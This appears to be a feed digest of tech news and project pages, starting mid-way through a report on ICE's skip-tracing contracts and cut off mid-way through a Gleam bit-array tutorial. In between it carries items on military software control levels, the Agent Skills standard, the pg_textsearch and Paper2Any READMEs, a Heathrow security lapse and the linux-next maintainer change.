In November, 404 Media reported ICE had allocated as much as $180 million to pay these bounty hunters and private investigators. Those procurement records said ICE was seeking assistance with a “docket size” of 1.5 million. The agency would give vendors batches of 50,000 last known addresses of aliens residing in the U.S., with the bounty hunters then verifying the people’s addresses or current location, and giving that information to ICE’s ERO. In the records, ICE said contractors should start with online research or commercial data before conducting physical surveillance.

It is not clear how exactly AI Solutions 87’s AI agent tool would fit into that model, but AI agents are generally used to speed up or handle repetitive tasks. Skip tracing, broadly, can be monotonous work, according to conversations with multiple members of the skip tracing and private investigator industry.

In November, 404 Media found one contractor recruited people on LinkedIn to physically track immigrants on ICE’s behalf for $300. The project aimed to pay former law enforcement and military officers, with no indication that those being recruited were licensed private investigators, and instead was open to people who were essentially members of the general public.

ICE has spent at least $11.6 million on skip tracing services since October, according to 404 Media’s review of procurement records. That includes large federal contractors like B.I. Incorporated and SOS International LLC, and companies focused on recovering assets like Global Recovery Group LLC.

AI Solutions 87 is registered to a residential building in West Bend, Wisconsin. AI Solutions 87 shares that address with two other companies called DC Gravity LLC and SDNexus Dataops LLC formed this May, according to incorporation records. Greg Behm, who is listed as an officer for each of those companies, did not respond to a request for comment.

About the author

Joseph is an award-winning investigative journalist focused on generating impact. His work has triggered hundreds of millions of dollars worth of fines, shut down tech companies, and much more.

Joseph Cox

Military Standard on Software Control Levels

Hacker News

entropicthoughts.com

2025-12-18 17:12:46

Comments...

Original Article

The mil-std-882e standard specifies levels of software control, i.e. how dangerous the software can be based on what it is responsible for. Although the standard is a little more complicated, we can simplify to essentially four levels:

The most alarming case is when the software has direct control of something that can be immediately dangerous if the software does the wrong thing.
Still dangerous, but slightly less so is either (a) when the software has direct control, but there is a delay between when it does the wrong thing and when it becomes dangerous; or (b) when the software is not directly in control, but a human must immediately react to software signals and perform an action to prevent danger. 1 ¹ E.g. the software commands a reactor shutdown when there are only seconds remaining until the reactor blows up.
Yet less dangerous is when the software is not in direct control, and there is time to verify its suggestion against independent methods to make sure the action recommended by the software is indeed appropriate.
The least dangerous is when software only has an auxiliary use and is not involved in controlling something serious.

I thought this was a neat way to look at things, and particularly salient now that llm s and computer vision have blown open new opportunities for injecting software into processes in which software were previously subservient to humans.

Agent Skills is now an open standard

Hacker News

claude.com

2025-12-18 17:04:32

Comments...

Original Article

Share

Copy link

https://claude.com/blog/organization-skills-and-directory

In October, we introduced skills —a way to teach Claude repeatable workflows tailored to how you work. Today we're making skills easier to deploy, discover, and build: organization-wide management for admins; a directory of partner-built skills from Notion, Canva, Figma, Atlassian, and others; and an open standard so skills work across AI platforms.

Manage skills across your organization

Claude Team and Enterprise plan admins can now provision skills centrally from admin settings. Admin-provisioned skills are enabled by default for all users. Users can still toggle individual skills off if they choose. This gives organizations consistent, approved workflows across teams while letting individual users customize their experience.

Discover, create, and edit new skills

Creating skills is now simpler. Describe what you want and Claude helps build it, or write instructions directly. For complex workflows, upload skill folders or use the skill-creator. Claude can also help you edit existing skills, and new previews show full contents so you can understand exactly what a skill does before enabling it.

Skills directory

A growing collection of partner-built skills is now available at claude.com/connectors .

Admins can provision these partner skills across their organization, giving teams immediate access to workflows for tools they already use without any custom development.

Logo Logo

Atlassian’s skills bring our decades of teamwork expertise and best practices to Claude. Now Claude doesn’t just see Jira tickets or Confluence pages, it knows what to do: turning specs into backlogs, generating status reports, surfacing company knowledge, triaging issues, and more.

Josh Devenny, Head of Product, Rovo Skills

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With Skills, Claude now understands how to work within Canva - not just connect to it. Anyone can create full multi-platform campaigns, generate on-brand presentations, and translate content, all with a single, simple prompt.

Anwar Haneef, GM & Head of Ecosystem

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Kate Reznykova, Engineering Manager, Cloudflare Agents

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Emil Sjölander, Director of Dev Tools

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Skills are a powerful way to extend Claude from figuring out a task to actually doing it. Vercel wants to enable everyone to ship sites, apps, and agents. We built the Vercel Deploy Skill alongside the Claude team to allow more people to go from idea to production.

Andrew Qu, Chief of Software

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By combining skills with Zapier MCP, organizations get AI that not only knows how work should be done, but actually does it reliably. Skills encode repeatable procedures and best practices; Zapier MCP Tools run them at scale across thousands of apps. The result is faster turnaround, reduced busywork, and repeatable AI-powered processes.

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An open standard

We're also publishing Agent Skills as an open standard. Like MCP, we believe skills should be portable across tools and platforms—the same skill should work whether you're using Claude or other AI platforms. We've been collaborating with members of the ecosystem, and we're excited to see early adoption of the standard.

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Claude Apps: Browse the skills directory and enable in Settings > Capabilities > Skills.
Claude Code: Install from the plugin directory or check skills into your repository.
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pg_textsearch: PostgreSQL extension for BM25 relevance-ranked full-text search

Lobsters

github.com

2025-12-18 16:45:08

Comments...

Original Article

pg_textsearch

Modern ranked text search for Postgres.

Simple syntax: ORDER BY content <@> 'search terms'
BM25 ranking with configurable parameters (k1, b)
Works with Postgres text search configurations (english, french, german, etc.)
Supports partitioned tables
Goal: state-of-the-art performance and scalability

🎉 Now Open Source! We're excited to share pg_textsearch with the community.

🚀 Status : v0.1.1-dev (prerelease) - Feature-complete but not yet optimized. Not yet recommended for production use. See ROADMAP.md for what's next.

Historical note

The original name of the project was Tapir - T extual A nalysis for P ostgres I nformation R etrieval. We still use the tapir as our mascot and the name occurs in various places in the source code.

PostgreSQL Version Compatibility

pg_textsearch supports:

PostgreSQL 17
PostgreSQL 18

New in PostgreSQL 18 Support

Embedded index name syntax : Use index_name:query format in cast expressions for better compatibility with PG18's query planner
Improved ORDER BY optimization : Full support for PG18's consistent ordering semantics
Query planner compatibility : Works correctly with PG18's more eager expression evaluation

Installation

Pre-built Binaries

Download pre-built binaries from the Releases page . Available for Linux and macOS (amd64 and arm64), PostgreSQL 17 and 18.

Build from Source

cd /tmp
git clone https://github.com/timescale/pg_textsearch
cd pg_textsearch
make
make install # may need sudo

Getting Started

Enable the extension (do this once in each database where you want to use it)

CREATE EXTENSION pg_textsearch;

Create a table with text content

CREATE TABLE documents (id bigserial PRIMARY KEY, content text);
INSERT INTO documents (content) VALUES
    ('PostgreSQL is a powerful database system'),
    ('BM25 is an effective ranking function'),
    ('Full text search with custom scoring');

Create a pg_textsearch index on the text column

CREATE INDEX docs_idx ON documents USING bm25(content) WITH (text_config='english');

Querying

Get the most relevant documents using the <@> operator

SELECT * FROM documents
ORDER BY content <@> 'database system'
LIMIT 5;

Note: <@> returns the negative BM25 score since Postgres only supports ASC order index scans on operators. Lower scores indicate better matches.

The index is automatically detected from the column. For explicit index specification:

SELECT * FROM documents
WHERE content <@> to_bm25query('database system', 'docs_idx') < -1.0;

Supported operations:

text <@> 'query' - Score text against a query (index auto-detected)
text <@> bm25query - Score text with explicit index specification

Verifying Index Usage

Check query plan with EXPLAIN:

EXPLAIN SELECT * FROM documents
ORDER BY content <@> 'database system'
LIMIT 5;

For small datasets, PostgreSQL may prefer sequential scans. Force index usage:

SET enable_seqscan = off;

Note: Even if EXPLAIN shows a sequential scan, <@> and to_bm25query always use the index for corpus statistics (document counts, average length) required for BM25 scoring.

Indexing

Create a BM25 index on your text columns:

CREATE INDEX ON documents USING bm25(content) WITH (text_config='english');

Index Options

text_config - PostgreSQL text search configuration to use (required)
k1 - term frequency saturation parameter (1.2 by default)
b - length normalization parameter (0.75 by default)

CREATE INDEX ON documents USING bm25(content) WITH (text_config='english', k1=1.5, b=0.8);

Also supports different text search configurations:

-- English documents with stemming
CREATE INDEX docs_en_idx ON documents USING bm25(content) WITH (text_config='english');

-- Simple text processing without stemming
CREATE INDEX docs_simple_idx ON documents USING bm25(content) WITH (text_config='simple');

-- Language-specific configurations
CREATE INDEX docs_fr_idx ON french_docs USING bm25(content) WITH (text_config='french');
CREATE INDEX docs_de_idx ON german_docs USING bm25(content) WITH (text_config='german');

Data Types

bm25query

The bm25query type represents queries for BM25 scoring with optional index context:

-- Create a bm25query with index name (required for WHERE clause and standalone scoring)
SELECT to_bm25query('search query text', 'docs_idx');
-- Returns: docs_idx:search query text

-- Embedded index name syntax (alternative form using cast)
SELECT 'docs_idx:search query text'::bm25query;
-- Returns: docs_idx:search query text

-- Create a bm25query without index name (only works in ORDER BY with index scan)
SELECT to_bm25query('search query text');
-- Returns: search query text

Note : In PostgreSQL 18, the embedded index name syntax using single colon ( : ) allows the query planner to determine the index name even when evaluating SELECT clause expressions early. This ensures compatibility across different query evaluation strategies.

bm25query Functions

Function	Description
to_bm25query(text) → bm25query	Create bm25query without index name (for ORDER BY only)
to_bm25query(text, text) → bm25query	Create bm25query with query text and index name
text <@> bm25query → double precision	BM25 scoring operator (returns negative scores)
bm25query = bm25query → boolean	Equality comparison

Performance

pg_textsearch indexes use a memtable architecture for efficient writes. Like other index types, it's faster to create an index after loading your data.

-- Load data first
INSERT INTO documents (content) VALUES (...);

-- Then create index
CREATE INDEX docs_idx ON documents USING bm25(content) WITH (text_config='english');

Monitoring

-- Check index usage
SELECT schemaname, tablename, indexname, idx_scan, idx_tup_read, idx_tup_fetch
FROM pg_stat_user_indexes
WHERE indexrelid::regclass::text ~ 'pg_textsearch';

Configuration

Optional settings in postgresql.conf :

# Query limit when no LIMIT clause detected
pg_textsearch.default_limit = 1000           # default 1000

# Auto-spill thresholds (set to 0 to disable)
pg_textsearch.bulk_load_threshold = 100000   # terms per transaction
pg_textsearch.memtable_spill_threshold = 800000  # posting entries (~8MB segments)

The memtable_spill_threshold controls when the in-memory index spills to disk segments. When the memtable reaches this many posting entries, it automatically flushes to a segment at transaction commit. This keeps memory usage bounded while maintaining good query performance.

Crash recovery : The memtable is rebuilt from the heap on startup, so no data is lost if Postgres crashes before spilling to disk.

Examples

Basic Search

CREATE TABLE articles (id serial PRIMARY KEY, title text, content text);
CREATE INDEX articles_idx ON articles USING bm25(content) WITH (text_config='english');

INSERT INTO articles (title, content) VALUES
    ('Database Systems', 'PostgreSQL is a powerful relational database system'),
    ('Search Technology', 'Full text search enables finding relevant documents quickly'),
    ('Information Retrieval', 'BM25 is a ranking function used in search engines');

-- Find relevant documents
SELECT title, content <@> 'database search' as score
FROM articles
ORDER BY score;

Also supports different languages and custom parameters:

-- Different languages
CREATE INDEX fr_idx ON french_articles USING bm25(content) WITH (text_config='french');
CREATE INDEX de_idx ON german_articles USING bm25(content) WITH (text_config='german');

-- Custom parameters
CREATE INDEX custom_idx ON documents USING bm25(content)
    WITH (text_config='english', k1=2.0, b=0.9);

Limitations

Partitioned Tables

BM25 indexes on partitioned tables use partition-local statistics . Each partition maintains its own:

Document count ( total_docs )
Average document length ( avg_doc_len )
Per-term document frequencies for IDF calculation

This means:

Queries targeting a single partition compute accurate BM25 scores using that partition's statistics
Queries spanning multiple partitions return scores computed independently per partition, which may not be directly comparable across partitions

Example : If partition A has 1000 documents and partition B has 10 documents, the term "database" would have different IDF values in each partition. Results from both partitions would have scores on different scales.

Recommendations :

For time-partitioned data, query individual partitions when score comparability matters
Use partitioning schemes where queries naturally target single partitions
Consider this behavior when designing partition strategies for search workloads

-- Query single partition (scores are accurate within partition)
SELECT * FROM docs
WHERE created_at >= '2024-01-01' AND created_at < '2025-01-01'
ORDER BY content <@> 'search terms'
LIMIT 10;

-- Cross-partition query (scores computed per-partition)
SELECT * FROM docs
ORDER BY content <@> 'search terms'
LIMIT 10;

Word Length Limit

pg_textsearch inherits PostgreSQL's tsvector word length limit of 2047 characters. Words exceeding this limit are ignored during tokenization (with an INFO message). This is defined by MAXSTRLEN in PostgreSQL's text search implementation.

For typical natural language text, this limit is never encountered. It may affect documents containing very long tokens such as base64-encoded data, long URLs, or concatenated identifiers.

This behavior is similar to other search engines:

Elasticsearch: Truncates tokens (configurable via truncate filter, default 10 chars)
Tantivy: Truncates to 255 bytes by default

Troubleshooting

-- List available text search configurations
SELECT cfgname FROM pg_ts_config;

-- List BM25 indexes
SELECT indexname FROM pg_indexes WHERE indexdef LIKE '%USING bm25%';

Installation Notes

If your machine has multiple Postgres installations, specify the path to pg_config :

export PG_CONFIG=/Library/PostgreSQL/18/bin/pg_config  # or 17
make clean && make && make install

If you get compilation errors, install Postgres development files:

# Ubuntu/Debian
sudo apt install postgresql-server-dev-17  # for PostgreSQL 17
sudo apt install postgresql-server-dev-18  # for PostgreSQL 18

Reference

Index Options

Option	Type	Default	Description
text_config	string	required	PostgreSQL text search configuration to use
k1	real	1.2	Term frequency saturation parameter (0.1 to 10.0)
b	real	0.75	Length normalization parameter (0.0 to 1.0)

Text Search Configurations

Available configurations depend on your Postgres installation:

# SELECT cfgname FROM pg_ts_config;
  cfgname
------------
 simple
 arabic
 armenian
 basque
 catalan
 danish
 dutch
 english
 finnish
 french
 german
 greek
 hindi
 hungarian
 indonesian
 irish
 italian
 lithuanian
 nepali
 norwegian
 portuguese
 romanian
 russian
 serbian
 spanish
 swedish
 tamil
 turkish
 yiddish
(29 rows)

Further language support is available via extensions such as zhparser .

Development Functions

These functions are for debugging and development use only. Their interface may change in future releases without notice.

Function	Description
bm25_dump_index(index_name) → text	Dump internal index structure (truncated)
bm25_dump_index(index_name, file_path) → text	Dump full index structure to file
bm25_summarize_index(index_name) → text	Show index statistics without content
bm25_spill_index(index_name) → int4	Force memtable spill to disk segment

-- Quick overview of index statistics
SELECT bm25_summarize_index('docs_idx');

-- Detailed dump for debugging (truncated output)
SELECT bm25_dump_index('docs_idx');

-- Full dump to file (includes hex data)
SELECT bm25_dump_index('docs_idx', '/tmp/docs_idx_dump.txt');

-- Force spill to disk (returns number of entries spilled)
SELECT bm25_spill_index('docs_idx');

Contributing

See CONTRIBUTING.md for development setup, code style, and how to submit pull requests.

Bug Reports : Create an issue
Feature Requests : Request a feature
General Discussion : Start a discussion

Show HN: Paper2Any – Open tool to generate editable PPTs from research papers

Hacker News

github.com

2025-12-18 16:44:11

Comments...

Original Article

DataFlow-Agent

AI-Powered Data & Paper Workflow Orchestration Platform

基于DFA的AI Agent多功能平台

中文 | English

快速开始 • 在线体验 • 文档 • 贡献指南

📑 目录

🔥 News
📐 项目架构
✨ 核心应用
🚀 快速开始
📂 项目结构
🗺️ Roadmap
🤝 贡献

🔥 News

📐 项目架构

_{DataFlow-Agent 延伸的三个核心应用：Paper2Any（论文多模态工作流）、Easy-DataFlow（数据治理管线）、DataFlow-Table（多源数据分析）}

✨ 核心应用

1️⃣ Paper2Any - 论文多模态工作流

从论文 PDF / 图片 / 文本出发，一键生成 可编辑 的科研绘图、演示文稿、视频脚本、学术海报等多模态内容。

🎯 核心功能

Paper2Any 当前包含以下几个子能力：

📊 Paper2Figure - 可编辑科研绘图

✅ 模型架构图生成
✅ 技术路线图生成（PPT + SVG）
🚧 实验数据图生成 (优化中)
✅ 支持 PDF / 图片 / 文本输入
✅ 输出可编辑 PPTX 格式

🎬 Paper2PPT - 可编辑演示文稿

✅ Beamer 版本 PPT 生成
🚧 开放式可编辑 PPT 生成（开发中）

🎬 Paper2Video - 论文讲解视频

🚧 自动生成视频脚本
🚧 分镜描述与时间轴
🚧 配图素材推荐
🚧 视频自动合成（开发中）

📌 Paper2Poster - 可编辑学术海报

🚧 版式自动设计
🚧 要点提炼
🚧 视觉优化

📸 ShowCase - Paper2Figure

模型架构图生成

输入	生成图	PPTX 截图
_{📄 论文 PDF}	_{🎨 生成的模型架构图}	_{📊 可编辑 PPTX}
绘图难度：简单 - 基础模型结构，清晰的模块划分
_{📄 论文PDF}	_{🎨 生成的模型架构图}	_{📊 可编辑 PPTX}
绘图难度：中等 - 包含多层次结构和数据流
_{📄 输入核心段落}	_{🎨 生成的模型架构图}	_{📊 可编辑 PPTX}
绘图难度：困难 - 复杂的多模块交互和详细注释

上传论文 PDF 文件，根据选择的 绘图难度 （简单/中等/困难），自动提取模型架构信息，生成对应复杂度的 可编辑 PPTX 格式 模型架构图。

技术路线图生成

输入	生成图（SVG）	PPTX 截图
_{📝 论文方法部分（中文）}	_{🗺️ 技术路线图 SVG}	_{📊 可编辑 PPTX}
语言：中文 - 中文技术路线图，适合国内学术交流
_{📝 论文方法部分（英文）}	_{🗺️ 技术路线图 SVG}	_{📊 可编辑 PPTX}
语言：英文 - 英文技术路线图，适合国际学术发表

粘贴论文方法部分文本，选择语言（中文/英文），自动梳理技术路线与模块依赖关系，生成 清晰的技术路线图 PPTX 与可编辑 SVG 。

实验数据图生成

输入	常规实验图	精美实验图
_{📄 输入：论文 PDF / 实验结果截图}	_{📈 输出：常规 Python 风格实验数据图}	_{🎨 输出：精美排版的实验数据图}

上传实验结果截图或表格，自动抽取关键数据并生成 可编辑的实验数据图 PPTX ，同时提供常规和精美两种风格，便于论文和汇报复用。

🖥️ 使用方式

方式一：Web 前端（推荐）

(目前在线版只支持邀请用户体验)访问在线体验地址： https://dcai-paper2any.cpolar.top/

特点：

🎨 现代化 UI 设计
📤 支持拖拽上传
⚙️ 可视化参数配置
📊 实时进度展示
📥 一键下载结果

2️⃣ Easy-DataFlow - 数据治理管线

从任务描述到可执行数据处理管线，AI 驱动的数据治理全流程

🎯 核心功能

功能模块	说明	状态
📊 管线推荐	从任务描述自动生成可执行 Python 管线代码	✅
✍️ 算子编写	AI 辅助编写自定义数据处理算子	✅
🎨 可视化编排	拖拽式构建数据处理流程	✅
🔄 Prompt 优化	自动优化算子提示词，提升效果	✅
🌐 Web 采集	自动化网页数据采集与结构化	✅

📸 功能展示

管线推荐：从任务到代码

_{💻 智能分析任务需求，自动推荐最优算子组合，生成可执行的 Python 管线代码}

算子编写：AI 辅助开发

_{⚙️ 使用 LLM 辅助从功能描述自动生成算子代码，并在同一界面内完成测试与调试}

可视化编排：拖拽式构建

_{🎨 通过可视化界面拖拽组合算子，自由搭建数据处理流程，所见即所得}

Prompt 优化：自动调优

_{✨ 复用现有算子，自动书写 DataFlow 的算子 Prompt Template，智能优化提示词}

Web 采集：网页到数据

_{📊 自动化网页数据采集与结构化转换，直接输出 DataFlow-ready 数据}

3️⃣ DataFlow-Table - 多源数据分析

一站式接入多源数据，自动化分析与洞察生成

🚧 正在开发中

DataFlow-Table 正在积极开发中，敬请期待！

计划功能 ：

📥 多数据源接入（数据库 / 文件 / Web / API）
🧹 智能清洗与标准化
📊 基于 AI 的自动分析
📝 自然语言分析报告生成
📈 交互式图表与报表

🚀 快速开始

环境要求

安装步骤

建议使用 Conda 创建隔离环境（推荐 Python 3.12）。

# 0. 创建并激活 conda 环境
conda create -n dataflow-agent python=3.12 -y
conda activate dataflow-agent

# 1. 克隆仓库
git clone https://github.com/OpenDCAI/DataFlow-Agent.git
cd DataFlow-Agent

# 2. 安装依赖（基础）
pip install -r requirements.txt

# 3. 安装包（开发模式）
pip install -e .

Paper2Any 额外依赖（可选，但推荐）

Paper2Any 需要额外依赖（见 requirements-paper.txt ），以及一些系统/conda 工具用于渲染与矢量图处理：

# 安装 Paper2Any 依赖
pip install -r requirements-paper.txt

# tectonic：建议用 conda 单独安装（LaTeX 引擎）
conda install -c conda-forge tectonic -y

# inkscape：用于 SVG/矢量图相关处理（Linux）
sudo apt-get update
sudo apt-get install -y inkscape

配置环境

export DF_API_KEY=your_api_key_here
export DF_API_URL=xxx 
# 如果需要使用第三方API中转站

第三方API中转站：

https://api.apiyi.com/

http://123.129.219.111:3000/

启动应用

Note

Paper2Any ：从论文 PDF / 图片 / 文本一键生成可编辑的科研绘图、技术路线图、实验数据图和演示文稿。

🎨 Paper2Any - 论文工作流

Web 前端（推荐）

# 启动后端 API
cd fastapi_app
uvicorn main:app --host 0.0.0.0 --port 8000

# 启动前端（新终端）
cd frontend-workflow
npm install
npm run dev

# 配置dev/DataFlow-Agent/frontend-workflow/vite.config.ts
# 修改 server.proxy 为：
export default defineConfig({
  plugins: [react()],
  server: {
    port: 3000,
    open: true,
    allowedHosts: true,
    proxy: {
      '/api': {
        target: 'http://127.0.0.1:8000',  // FastAPI 后端地址
        changeOrigin: true,
      },
    },
  },
})

访问 http://localhost:3000

Tip

Paper2Figure 网页端内测说明

当你部署了前端，还需要 手动新建 一个 invite_codes.txt 文件，并写入你的邀请码（例如： ABCDEFG123456 ）。
然后再启动后端；
如果暂时不想部署前后端，可以先通过本地脚本体验 Paper2Any 的核心能力：
- python tests/test_paper2figure_with_sam.py ：模型架构图生成
- python tests/test_paper2technical.py ：技术路线图生成
- python tests/test_paper2video.py ：Beamer PPT 生成

特点：

✨ 现代化 UI 设计
🎯 可视化参数配置
📊 实时进度展示
📥 一键下载结果

Note

Easy-DataFlow ：从自然语言任务描述出发，自动推荐算子与管线结构，生成可执行的数据处理管线。

📊 Easy-DataFlow - 数据治理

Gradio Web 界面

访问 http://127.0.0.1:7860

特点：

🚀 快速部署
🔧 灵活配置
📝 支持批量处理

Note

DataFlow-Table ：面向多源数据接入与探索式分析，目前仍在开发中。

🔍 DataFlow-Table - 数据分析

🚧 正在开发中，敬请期待！

📂 项目结构

DataFlow-Agent/
├── dataflow_agent/          # 核心框架代码
│   ├── agentroles/         # Agent 定义（@register 自动注册）
│   ├── workflow/           # Workflow 定义（wf_*.py）
│   ├── promptstemplates/   # Prompt 模板库
│   ├── toolkits/           # 工具集（LLM/Docker/Image 等）
│   ├── graphbuilder/       # StateGraph 构建器
│   └── states/             # 状态管理
├── gradio_app/             # Gradio Web 界面
│   ├── app.py             # 主程序
│   └── pages/             # 页面模块（自动发现）
├── fastapi_app/            # FastAPI 后端服务
│   ├── main.py            # API 入口
│   └── routers/           # 路由模块
├── frontend-workflow/      # 前端工作流编辑器
│   ├── src/               # 源代码
│   └── public/            # 静态资源
├── docs/                   # 文档
├── static/                 # 静态资源（图片等）
├── script/                 # 脚本工具
└── tests/                  # 测试用例

🗺️ Roadmap

🎓 Paper 系列

功能	状态	子功能
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Someone Boarded a Plane at Heathrow Without a Ticket or Passport

Schneier

www.schneier.com

2025-12-18 16:41:14

I’m sure there’s a story here: Sources say the man had tailgated his way through to security screening and passed security, meaning he was not detected carrying any banned items. The man deceived the BA check-in agent by posing as a family member who had their passports and boarding pass...

Original Article

Someone Boarded a Plane at Heathrow Without a Ticket or Passport

I’m sure there’s a story here :

Sources say the man had tailgated his way through to security screening and passed security, meaning he was not detected carrying any banned items.

The man deceived the BA check-in agent by posing as a family member who had their passports and boarding passes inspected in the usual way.

Tags: air travel , social engineering

Posted on December 18, 2025 at 11:41 AM • 1 Comments

Sidebar photo of Bruce Schneier by Joe MacInnis.

A change of maintainership for linux-next

Linux Weekly News

lwn.net

2025-12-18 16:40:50

Stephen Rothwell, who has maintained the kernel's linux-next integration tree from its inception, has announced his retirement from that role: I will be stepping down as Linux-Next maintainer on Jan 16, 2026. Mark Brown has generously volunteered to take up the challenge. He has helped in the ...

Original Article

Stephen Rothwell, who has maintained the kernel's linux-next integration tree from its inception, has announced his retirement from that role:

I will be stepping down as Linux-Next maintainer on Jan 16, 2026. Mark Brown has generously volunteered to take up the challenge. He has helped in the past filling in when I have been unavailable, so hopefully knows what he is getting in to. I hope you will all treat him with the same (or better) level of respect that I have received.
It has been a long but mostly interesting task and I hope it has been helpful to others. It seems a long time since I read Andrew Morton's "I have a dream" email and decided that I could help out there - little did I know what I was heading for.

Over the last two decades or so, the kernel's development process has evolved from an unorganized mess with irregular releases to a smooth machine with a new release every nine or ten weeks. That would not have happened without linux-next; thanks are due to Stephen for helping to make the current process possible.

Making the Most of Bit Arrays

Lobsters

gearsco.de

2025-12-18 16:38:00

Comments...

Original Article

18 December, 2025

Gleam has a special piece of syntax that most other languages don't: Bit arrays. Taken from Erlang, bit array syntax allows the constructing and pattern matching on binary data. Bit arrays are extremely powerful, but unfortunately the documentation is a little sparse . It lists all the possible options you can use, as well as linking to the Erlang documentation for further reading, but the syntax isn't exactly the same as on Erlang, so there's some ambiguity as to how it exactly works. To make it easier, I wanted to write a comprehensive guide, to make it as easy as possible to understand how they work.

The basics

Bit arrays are delimited by double angle brackets ( << and >> ), and contain zero or more segments , separated by commas. A segment is a value which is encoded somehow as a sequence of bits. They have no actual separation other than syntactically, they are just a way of building up a bit array out of various different parts.

A segment consists of a value, followed by a series of options using the syntax value:option1-option2-option3 .

There are several different data types that can appear as the value of a bit array segment, and each has a slightly different set of defaults, as well as options that can be used to modify how it is encoded.

The default assumed type is Int , and if you want a segment that is a non-integer, you need to specify that by using the type-specific option, unless you are using a literal, in which case it is inferred automatically.

Segment types

As mentioned above, the default segment type is Int . By default, integer segments are encoded as an 8-bit signed integer, although this can be modified using various options, which will be mentioned later.

The syntax for printing bit arrays with the echo keyword uses 8-bit unsigned integer segments to represent the structure of the bit array, so that is what I will be using in the rest of this article to show the encoding of various bit arrays.

echo <<1, 2, -3>>
// <<1, 2, 253>>

Bit array syntax also allows for Float segments. If you are not using a literal float value, the float option is required for the program to type-check. By default, floats are encoded as 64-bit IEEE 754 floats, although the size can be changed to either 32 or 16 bit.

echo <<3.14>>
// <<64, 9, 30, 184, 81, 235, 133, 31>>

let some_float = 1.0
echo <<some_float>>
// Error: Expected type Int, found type Float

echo <<some_float:float>>
// <<63, 240, 0, 0, 0, 0, 0, 0>>

Strings are another data type that can be used as a bit array segment. By default, strings are encoded in UTF-8 , although this can be changed using the utf16 and utf32 options. The utf8 option can also be used, when the value is not a literal.

echo <<"Hello 🌍">>
// <<72, 101, 108, 108, 111, 32, 240, 159, 140, 141>>

echo <<"Hello 🌍":utf16>>
// <<0, 72, 0, 101, 0, 108, 0, 108, 0, 111, 0, 32, 216, 60, 223, 13>>

echo <<"Hello 🌍":utf32>>
// <<0, 0, 0, 72, 0, 0, 0, 101, 0, 0, 0, 108, 0, 0, 0, 108, 0, 0, 0, 111, 0, 0, 0, 32, 0, 1, 243, 13>>

let greeting = "Hello"
echo <<greeting>>
// Error: Expected type Int, found type String

echo <<greeting:utf8>>
// <<72, 101, 108, 108, 111>>

UTF codepoints, using the built-in UtfCodepoint type, are also possible to use as bit array segments. These work similar to strings, but only represent a single codepoint instead of multiple. Like strings, they can be encoded as UTF-8, UTF-16 or UTF-32, although they have differently named options: utf8_codepoint , utf16_codepoint and utf32_codepoint . Since there are no UTF codepoint literals, on of these options is always required.

let assert [codepoint] = string.to_utf_codepoints("🌍")

echo <<codepoint>>
// Error: Expected type Int, found type UtfCodepoint

echo <<codepoint:utf8_codepoint>>
// <<240, 159, 140, 141>>

echo <<codepoint:utf16_codepoint>>
// <<216, 60, 223, 13>>

echo <<codepoint:utf32_codepoint>>
// <<0, 1, 243, 13>>

The last data type that can be used is BitArray . The encoding here is pretty obvious, simply consisting of the bits inside the specified bit array. Bit array segments must use the bits option.

let bit_array = <<3, 4, 5>>

echo <<bit_array>>
// Error: Expected type Int, found type BitArray

echo <<bit_array:bits>>
// <<3, 4, 5>>

echo <<1, 2, bit_array:bits, 6>>
// <<1, 2, 3, 4, 5, 6>>

Segment size

Possibly the most commonly used bit array option is size . The size option allows you to customise the size that a particular segment has, specified in bits.

echo <<1024:size(16)>>
// <<4, 0>>

Since size is so commonly used, it even has a shorthand syntax that you can use, where the size part is omitted:

echo <<1.0:32>>
// <<63, 128, 0, 0>>

There is another option you can use in conjunction with size : unit . The unit option allows you to specify a value that is multiplied by the size. This is most commonly useful for specifying sizes in bytes, but can be used for any size unit.

echo <<1024:2-unit(8)>>
// <<4, 0>>

echo <<12:3-unit(2)>>
// <<12:6>>

For bit arrays which are not a whole number of bytes, the trailing bits at the end are suffixed with the number of bits.

There are some limitations to the size option though. While it is unrestricted on integer segments, float segments only support sizes of 16 , 32 or 64 , as other size floats are not well defined.

String and UTF codepoint segments cannot use the size option; they have a fixed size based on their value.

Bit array segments can use the size option to truncate the bit array to a particular size, but if the specified size is larger than the size of the bit array, it will lead to a runtime error.

Endianness

By default, bit array segments are big endian , however it is possible to configure them to be little endian instead, using the little option. There is a big option too, but it does nothing other than perhaps making the intention of the code clearer. There is also native , which chooses endianness based on the processor that is running the code.

Endianness is easiest to understand when it comes to integer segments, but it also applies to Float s as well as UTF-16 and UTF-32 strings and codepoints. It is not allowed for UTF-8 or bit array segments.

Endianness usually doesn't matter when using bit arrays internally; it is often only useful when it comes to interacting with a predefined API.

Pattern matching

The syntax shown until now has been for constructing bit arrays, but as mentioned at the beginning, bit array syntax can also used to pattern match on binary data and extract information from it. The syntax is largely the same, but there are some limitations and additional features when it comes to pattern matching.

In general, most of the syntax that can be used when constructing bit arrays can be used in the same way when pattern matching. You can either match on a specific literal, or assign the value to a variable.

One thing to note is that segment information is not stored in the bit array, so for example a Float segment can be matched on as an Int , and vice versa.

let assert <<x, y, z>> = <<1, 2, 3>>
echo #(x, y, z)
// #(1, 2, 3)

let assert <<1, a, 3>> = <<1, 2, 3>>
echo a
// 2

let assert <<x, y>> = <<3.14:16>>
echo #(x, y)
// #(66, 72)

let assert <<float:float-size(16)>> = <<60, 0>>
echo float
// 1.0

Strings

One restriction to note is that arbitrary length strings cannot be matched on in this way. The following is an error:

let assert <<message:size(5)>> = <<"Hello">>

Because UTF-8 is variable sized, there's no guarantee that any given sequence of bytes is valid UTF-8. You can still match on UTF codepoints though, as well as string literals.

let assert <<"Hello", last_char>> = <<"Hello!">>
echo last_char
// 33

let assert <<first:utf8_codepoint>> = <<81>>
echo first
// utfcodepoint(Q)

Bits and bytes

For matching on bit arrays, there are two options: The bits option that is used in construction, and a second bytes option, which only matches whole numbers of bytes. If given an explicit size, that number of bits/bytes is matched. If the size option is not used, they match everything remaining in the bit array.

Note : When using the bytes option, size is measured in bytes, and the unit option cannot be used. This is currently a bug in Gleam, you can track its status here .

let assert <<_, bits:bits-size(12), _:size(4)>> = <<1, 2, 3>>
echo bits
// <<2, 0:4>>

let assert <<_, bytes:bytes-size(3), _>> = <<1, 2, 3, 4, 5>>
echo bits
// <<2, 3, 4>>

let assert <<first:4, rest:bits>> = <<1, 2, 3>>
echo rest
// <<16, 32, 3:4>>

let assert <<_, _, rest:bytes>> = <<1, 2, 3, 4, 5, 6>>
echo rest
// <<3, 4, 5, 6>>

let assert <<value:bytes>> = <<1, 2:2, 3>>
// Error: Pattern match failed

Signedness

